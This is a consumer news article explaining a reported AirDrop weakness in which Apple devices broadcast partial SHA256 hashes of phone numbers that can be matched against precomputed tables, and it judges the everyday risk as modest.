Apple AirDrop Vulnerability Broadcasts User Phone Numbers to Potential Attackers
iPhone users who frequently use the AirDrop feature to share images, videos, or other files may unwittingly be broadcasting their phone numbers to people nearby. According to a recent Ars Technica report, a hacker would need to have a laptop and a “wireless packet sniffer” dongle to exploit the vulnerability. Armed with those components, a security researcher testing the proof-of-concept software designed to exploit the vulnerability was able to see “details of more than a dozen iPhones and Apple Watches that were within radio range” and use this information to obtain users’ phone numbers.
The vulnerability, it appears, is due to the way Apple and other tech companies attempt to make wireless discovery features easier and more convenient to use. These automatic discovery tools typically require some sort of exchange of information between devices—in this case, the phone sending files via AirDrop and the device receiving them. But in order to accomplish this, Apple devices with the AirDrop feature switched on end up broadcasting potentially sensitive data to everyone in the vicinity.
The good news is that while iPhones using AirDrop are effectively broadcasting the user’s phone number, that doesn’t mean that the phone number is easily visible (even to someone with the right hardware to scan for it). That’s because these details are broadcast in the form of a hexadecimal “hash value” created by a cryptographic function—one developed by the NSA. Apple devices only broadcast a partial SHA256 hash of the phone number to make AirDrop’s automatic discovery feature work. Similarly, when a user implements Wi-Fi password sharing on an Apple device, that device starts broadcasting SHA256 hashes of the user’s phone number, their email address, and their Apple ID.
The bad news is that the partial hash defense seems to be a rather poor safeguard when it comes to phone numbers, because with these (unlike, for example, Bitcoin keys or unknown phrases of indeterminate length), it’s actually possible to create a huge database of all the possible phone numbers in a given area code along with their SHA256 hash values. According to the cybersecurity firm Hexway, which discovered the AirDrop vulnerability and demonstrated the initial proof of concept, an attacker could therefore use partial hashes together together with one of these pre-compiled databases to figure out an AirDrop user’s full phone number.
While an interesting discovery, this isn’t what we’d call a code-red level event. First of all, phone numbers aren’t exactly state secrets, and even if you don’t like to give yours out, someone knowing your phone number is not nearly as much of an issue as someone knowing your passwords or your Social Security Number. And secondly, the likelihood of a dongle-equipped, packet-sniffing hacker sitting next to you on your morning commute is fairly slim. Still, the fact that this data is broadcast by a helpful feature that most people believe to be secure may be worrying to some Apple users.
All in all, while this likely isn’t the sort of thing that will impact everyday users, some truly security-minded individuals may want to disable AirDrop and other features which rely on automatic discovery as a way to eliminate all risk. Most of us, however, will go on using features like AirDrop—though perhaps will think twice before doing so on a crowded train…and be a bit more skeptical of strangers who call our number.